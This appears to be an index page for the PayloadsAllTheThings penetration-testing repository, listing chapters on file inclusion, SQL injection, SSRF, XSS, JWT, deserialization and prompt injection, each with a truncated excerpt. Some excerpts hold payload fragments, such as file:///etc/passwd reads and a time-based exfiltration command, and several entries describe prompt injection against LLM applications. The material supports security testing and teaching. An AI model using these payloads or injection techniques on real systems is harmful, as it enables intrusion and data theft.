swisskyrepo/PayloadsAllTheThings

Features

• Web Application Penetration Testing - | Identifying and validating security flaws in web services by systematically applying known attack vectors and injection patterns.
• Remote File Inclusion Payloads - > Remote File Inclusion (RFI) is a type of vulnerability that occurs when an application includes a remote file, usually through user input, without properly validating or sanitizing the input. Remote File Inclusion does
• Community-Sourced Knowledge Bases - Aggregates security research and attack vectors from a global contributor base to maintain an up-to-date repository of techniques.
• Offensive Security Cheatsheets - A structured repository of actionable payloads and command-line sequences designed to assist security professionals in testing application resilience.
• Vulnerability Research - A comprehensive collection of vulnerability exploitation techniques, attack vectors, and security research methodologies for penetration testing and security assessments.
• Local File Inclusion Payloads - **File Inclusion Vulnerability** should be differentiated from **Path Traversal**. The Path Traversal vulnerability allows an attacker to access a file, usually exploiting a "reading" mechanism implemented in the target
• Exploit Taxonomies - Categorizes diverse exploitation methods by vulnerability type and target environment to facilitate rapid lookup during security assessments.
• Prepared Statements - PDO, or PHP Data Objects, is an extension for PHP that provides a consistent and secure way to access and interact with databases. It is designed to offer a standardized approach to database interaction, allowing develop
• SQL Injection Scanners - - [sqlmapproject/sqlmap](https://github.com/sqlmapproject/sqlmap) - Automatic SQL injection and database takeover tool - [r0oth3x49/ghauri](https://github.com/r0oth3x49/ghauri) - An advanced cross-platform tool that auto
• AI Prompt Injection Vulnerabilities - Indirect Prompt Injection is a type of security vulnerability that occurs in systems using AI, particularly Large Language Models (LLMs), where user-provided input is processed without proper sanitization. This type of a
• Deserialization Vulnerability Resources - Check the following sub-sections, located in other chapters : - [Java deserialization : ysoserial, ...](Java/) - [PHP (Object injection) : phpggc, ...](PHP/) - [Ruby : universal rce gadget, ...](Ruby/) - [Python : pickle
• Prompt Injection Payloads - Direct Prompt Injection is a security vulnerability in AI-powered applications where a malicious user manipulates the prompt to make the AI ignore its original instructions and execute unintended commands. Here are a lis
• Security Methodologies - A centralized knowledge hub offering standardized approaches and tactical guidance for evaluating the security posture of modern web and cloud environments.
• Vulnerability Discovery References - | Providing a centralized repository of methodologies, tools, and technical references for conducting thorough security audits and vulnerability discovery.
• Command Execution Cheat Sheets - Content of this page has been moved to [InternalAllTheThings/active-directory](https://github.com/swisskyrepo/InternalAllTheThings/) - [Active Directory - Certificate Services](https://swisskyrepo.github.io/InternalAllTh
• Account Takeover Techniques - ### Account Takeover via Cross Site Scripting 1. Find an XSS inside the application or a subdomain if the cookies are scoped to the parent domain : `*.domain.com` 2. Leak the current **sessions cookie** 3. Authenticate a
• Cross-Site Scripting Techniques - ### XSS Hunter > XSS Hunter allows you to find all kinds of cross-site scripting vulnerabilities, including the often-missed blind XSS. The service works by hosting specialized XSS probes which, upon firing, scan the pag
• System Prompt Injection Payloads - The system prompt and user prompt are key concepts in conversational AI that define how the interaction between the AI and the user is shaped. - The system prompt is the set of instructions and contextual information tha
• URL Scheme Exploits - ### File Allows an attacker to fetch the content of a file on the server. Transforming the SSRF into a file read. `[](#__codelineno-24-1)file:///etc/passwd [](#__codelineno-24-2)file://\/\/etc/passwd` ### HTTP Allows an
• AWS Pentesting Resources - Content of this page has been moved to [InternalAllTheThings/active-directory](https://github.com/swisskyrepo/InternalAllTheThings/) - [Active Directory - Certificate Services](https://swisskyrepo.github.io/InternalAllTh
• Docker Pentesting Resources - Content of this page has been moved to [InternalAllTheThings/active-directory](https://github.com/swisskyrepo/InternalAllTheThings/) - [Active Directory - Certificate Services](https://swisskyrepo.github.io/InternalAllTh
• Authentication Bypass Techniques - In a standard authentication mechanism, users provide a username and password. The application typically checks these credentials against a database. For example, a SQL query might look something like this: `[](#__codeli
• Authentication Misconfigurations - > JSON Web Token (JWT) is an open standard (RFC 7519) that defines a compact and self-contained way for securely transmitting information between parties as a JSON object. This information can be verified and trusted bec
• Blind SSRF Exploitation - > When exploiting server-side request forgery, we can often find ourselves in a position where the response cannot be read. Use an SSRF chain to gain an Out-of-Band output: [assetnote/blind-ssrf-chains](https://github.co
• Data Exfiltration Payloads - ### Time Based Data Exfiltration Extracting data char by char and detect the correct value based on the delay. - Correct value: wait 5 seconds `[](#__codelineno-32-1)swissky@crashlab:~$ time if [ $(whoami|cut -c 1) == s
• Deserialization Gadgets - > A POP (Property Oriented Programming) gadget is a piece of code implemented by an application's class, that can be called during the deserialization process. POP gadgets characteristics: - Can be serialized - Has publi
• Filter Bypass Techniques - ### Default Targets By default, Server-Side Request Forgery are used to access services hosted on `localhost` or hidden further on the network. - Using `localhost` `[](#__codelineno-2-1)http://localhost:80 [](#__codeline
• SQL Injection Techniques - > Routed SQL injection is a situation where the injectable query is not the one which gives output but the output of injectable query goes to the query which gives output. - Zenodermus Javanicus In short, the result of t
• JSON Web Tokens - > JSON Web Token (JWT) is an open standard (RFC 7519) that defines a compact and self-contained way for securely transmitting information between parties as a JSON object. This information can be verified and trusted bec
• Mass Assignment Vulnerabilities - > JSON Web Token (JWT) is an open standard (RFC 7519) that defines a compact and self-contained way for securely transmitting information between parties as a JSON object. This information can be verified and trusted bec
• Security Vulnerability Summaries - - [Methodology](#methodology) - [Proof of Concept](#proof-of-concept) - [Data Grabber](#data-grabber) - [CORS](#cors) - [UI Redressing](#ui-redressing) - [Javascript Keylogger](#javascript-keylogger) - [Other Ways](#othe
• SQL Injection Detection Tools - Detecting the entry point in SQL injection (SQLi) involves identifying locations in an application where user input is not properly sanitized before it is included in SQL queries. - **Error Messages**: Inputting special
• SQL Injection Payloads - Second Order SQL Injection is a subtype of SQL injection where the malicious SQL payload is primarily stored in the application's database and later executed by a different functionality of the same application. Unlike f
• Stacked SQL Injections - Stacked Queries SQL Injection is a technique where multiple SQL statements are executed in a single query, separated by a delimiter such as a semicolon (`;`). This allows an attacker to execute additional malicious SQL c
• System Escape Techniques - Content of this page has been moved to [InternalAllTheThings/active-directory](https://github.com/swisskyrepo/InternalAllTheThings/) - [Active Directory - Certificate Services](https://swisskyrepo.github.io/InternalAllTh
• Vulnerability Exploitation References - A curated index of common security flaws, providing technical explanations and practical examples for identifying and verifying potential system weaknesses.
• Version-Controlled Knowledge Bases - Utilizes distributed source control to track changes, manage contributions, and maintain the historical integrity of the security research data.
• Security Resource Aggregators - Curates and maintains a centralized index of third-party security tools, research papers, and external documentation for comprehensive threat analysis.
• Scaffolding Tools - Standardizes the creation of new vulnerability chapters by enforcing a consistent file structure and metadata format across the repository.